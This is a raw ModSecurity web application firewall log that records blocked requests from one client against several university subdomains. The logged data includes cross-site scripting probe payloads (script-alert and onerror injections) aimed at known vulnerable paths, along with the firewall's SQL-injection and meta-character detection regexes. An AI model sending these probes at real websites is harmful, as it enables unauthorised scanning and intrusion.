[Tue Aug 29 11:53:00.718334 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAoml0EAAAAf"]
[Tue Aug 29 11:53:01.556132 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAohZ5YAAAAZ"]
[Tue Aug 29 11:53:01.556700 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAoqbOIAAAAj"]
[Tue Aug 29 11:53:01.572269 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAoocvEAAAAh"]
[Tue Aug 29 11:53:01.572348 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAot8K4AAAAn"]
[Tue Aug 29 11:53:01.573162 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAofm34AAAAX"]
[Tue Aug 29 11:53:01.573393 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAoXJtQAAAAP"]
[Tue Aug 29 11:53:01.573621 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAoml0IAAAAf"]
[Tue Aug 29 11:53:01.578538 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAoAkvsAAAAC"]
[Tue Aug 29 11:53:01.578873 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAfWOTsAAAAL"]
[Tue Aug 29 11:53:01.676554 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rcCo-f0AAAfWOTwAAAAL"]
[Tue Aug 29 11:53:01.788365 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rcCo-f0AAAoocvIAAAAh"]
[Tue Aug 29 11:53:01.901719 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAfWOT0AAAAL"]
[Tue Aug 29 11:53:02.546069 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAolKSwAAAAe"]
[Tue Aug 29 11:53:02.548021 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15rsCo-f0AAAfWOT4AAAAL"]
[Tue Aug 29 11:53:02.549731 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAoml0QAAAAf"]
[Tue Aug 29 11:53:02.629640 2023] [:error] [pid 2601] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAopQ0QAAAAi"]
[Tue Aug 29 11:53:02.634298 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAnTlZEAAAAA"]
[Tue Aug 29 11:53:02.643483 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAot8LAAAAAn"]
[Tue Aug 29 11:53:02.683345 2023] [:error] [pid 2601] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAopQ0UAAAAi"]
[Tue Aug 29 11:53:02.732158 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoVqscAAAAH"]
[Tue Aug 29 11:53:02.735449 2023] [:error] [pid 2601] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAopQ0YAAAAi"]
[Tue Aug 29 11:53:02.739063 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAonhoMAAAAg"]
